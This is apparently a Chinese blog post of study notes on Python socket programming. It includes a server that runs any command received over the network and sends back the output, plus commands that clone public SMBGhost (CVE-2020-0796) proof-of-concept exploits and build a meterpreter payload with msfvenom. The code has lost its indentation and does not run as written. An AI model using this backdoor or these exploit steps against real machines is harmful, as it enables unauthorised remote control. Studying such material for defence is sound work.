eveplw

导航

一.网络通信与socket

一.Socket

针对TCP/IP协议簇进行的程序封装,在Windows/Linux均有这样的底层模块。

 

二.网络编程

import socket

# 定义一个客户端连接
def test_client():
    s = socket.socket()
    s.connect(('192.168.19.130', 500))
    content = "Hello World"
    s.send(content.encode('utf-8'))
    s.close()

# 定义一个服务端连接:
def test_server():
s = socket.socket()
s.bind(('127.0.0.1', 500))
s.listen()
while True:
chanel, client = s.accept() # 接收来自客户端的数据
print(client)
test_server()

# 核心思路:客户端发送一条特殊字符串,里面包含要执行的命令,让服务器执行命令并返回结果给客户端
def attack_talk():
s = socket.socket()
s.bind(('0.0.0.0', 500))
s.listen()
chanel, client = s.accept() # 接收来自客户端的数据
while True:
receive = chanel.recv(10240).decode()
if receive.startswith('==##=='):
command = receive.split(',')[-1]
reply = os.popen(command).read()
chanel.send(f"命令{command}的运行结果:\n{reply}".encode())
else:
print(f"收到消息:{receive}")
reply = receive.replace("吗?", "!")
chanel.send(reply.encode())
   except:
   s.close()
   attack_talk()
if __name__ =='__main__':
attack_talk()

 

三.Window永恒之蓝漏洞利用

 

四.Windows永恒之黑利用

# git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
# python3 setup.py install
# python3 CVE-2020-0796.py 192.168.1.245

# git clone https://github.com/root-tools/SMBGhost_RCE_PoC
# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -b '\x00' -f python > exploit
# apt-get update
# apt-get -y install gedit
# gedit exploit

 此漏洞存在于Windows10 1903版本,现已经修复

posted on 2022-09-03 16:58  eveplw  阅读(57)  评论(0编辑  收藏  举报